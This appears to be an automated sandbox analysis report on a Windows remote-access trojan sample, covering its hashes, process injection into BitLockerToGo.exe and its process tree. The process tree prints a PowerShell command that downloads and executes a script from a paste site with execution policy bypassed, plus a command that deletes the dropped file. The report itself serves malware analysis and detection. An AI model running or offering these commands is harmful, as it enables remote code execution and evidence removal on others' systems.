Analysis
-
max time kernel
135s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28-10-2024 14:31
Static task
static1
Behavioral task
behavioral1
Sample
2024-10-28_2dc8cdf825e23ff1df1ad11b3a6f1973_poet-rat_snatch.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-10-28_2dc8cdf825e23ff1df1ad11b3a6f1973_poet-rat_snatch.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-10-28_2dc8cdf825e23ff1df1ad11b3a6f1973_poet-rat_snatch.exe
-
Size
16.0MB
-
MD5
2dc8cdf825e23ff1df1ad11b3a6f1973
-
SHA1
82af57e0e6d7cf944148d3a16d7c8ca94fa982f8
-
SHA256
5d215747817125559e1a2d934c301ab466cbc956a6839c8a45f8b02b84b184d0
-
SHA512
3f20bb95a167d10a2998a63ab0ccd69fe81822d24a39d868d019ac0ff890067c23c015dc0be531d9531be26d6d3f44d7f11c23214ba4778e038b6844f8c8879b
-
SSDEEP
98304:dKulY9+o0L82IacWOEF8xbADr/xLCqjqdYCDBvYuSHFCxMg:DZVyj8/tCGiBdSHF7g
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 31 2852 powershell.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
2024-10-28_2dc8cdf825e23ff1df1ad11b3a6f1973_poet-rat_snatch.exedescription pid process target process PID 3848 set thread context of 4068 3848 2024-10-28_2dc8cdf825e23ff1df1ad11b3a6f1973_poet-rat_snatch.exe BitLockerToGo.exe -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
BitLockerToGo.exepowershell.execmd.exe2024-10-28_2dc8cdf825e23ff1df1ad11b3a6f1973_poet-rat_snatch.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-10-28_2dc8cdf825e23ff1df1ad11b3a6f1973_poet-rat_snatch.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 2852 powershell.exe 2852 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2852 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
2024-10-28_2dc8cdf825e23ff1df1ad11b3a6f1973_poet-rat_snatch.exeBitLockerToGo.exedescription pid process target process PID 3848 wrote to memory of 4068 3848 2024-10-28_2dc8cdf825e23ff1df1ad11b3a6f1973_poet-rat_snatch.exe BitLockerToGo.exe PID 3848 wrote to memory of 4068 3848 2024-10-28_2dc8cdf825e23ff1df1ad11b3a6f1973_poet-rat_snatch.exe BitLockerToGo.exe PID 3848 wrote to memory of 4068 3848 2024-10-28_2dc8cdf825e23ff1df1ad11b3a6f1973_poet-rat_snatch.exe BitLockerToGo.exe PID 3848 wrote to memory of 4068 3848 2024-10-28_2dc8cdf825e23ff1df1ad11b3a6f1973_poet-rat_snatch.exe BitLockerToGo.exe PID 3848 wrote to memory of 4068 3848 2024-10-28_2dc8cdf825e23ff1df1ad11b3a6f1973_poet-rat_snatch.exe BitLockerToGo.exe PID 3848 wrote to memory of 4068 3848 2024-10-28_2dc8cdf825e23ff1df1ad11b3a6f1973_poet-rat_snatch.exe BitLockerToGo.exe PID 3848 wrote to memory of 4068 3848 2024-10-28_2dc8cdf825e23ff1df1ad11b3a6f1973_poet-rat_snatch.exe BitLockerToGo.exe PID 3848 wrote to memory of 4068 3848 2024-10-28_2dc8cdf825e23ff1df1ad11b3a6f1973_poet-rat_snatch.exe BitLockerToGo.exe PID 3848 wrote to memory of 4068 3848 2024-10-28_2dc8cdf825e23ff1df1ad11b3a6f1973_poet-rat_snatch.exe BitLockerToGo.exe PID 3848 wrote to memory of 4068 3848 2024-10-28_2dc8cdf825e23ff1df1ad11b3a6f1973_poet-rat_snatch.exe BitLockerToGo.exe PID 4068 wrote to memory of 2852 4068 BitLockerToGo.exe powershell.exe PID 4068 wrote to memory of 2852 4068 BitLockerToGo.exe powershell.exe PID 4068 wrote to memory of 2852 4068 BitLockerToGo.exe powershell.exe PID 4068 wrote to memory of 468 4068 BitLockerToGo.exe cmd.exe PID 4068 wrote to memory of 468 4068 BitLockerToGo.exe cmd.exe PID 4068 wrote to memory of 468 4068 BitLockerToGo.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-10-28_2dc8cdf825e23ff1df1ad11b3a6f1973_poet-rat_snatch.exe"C:\Users\Admin\AppData\Local\Temp\2024-10-28_2dc8cdf825e23ff1df1ad11b3a6f1973_poet-rat_snatch.exe"1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3848 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4068 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2852
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"3⤵
- System Location Discovery: System Language Discovery
PID:468
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82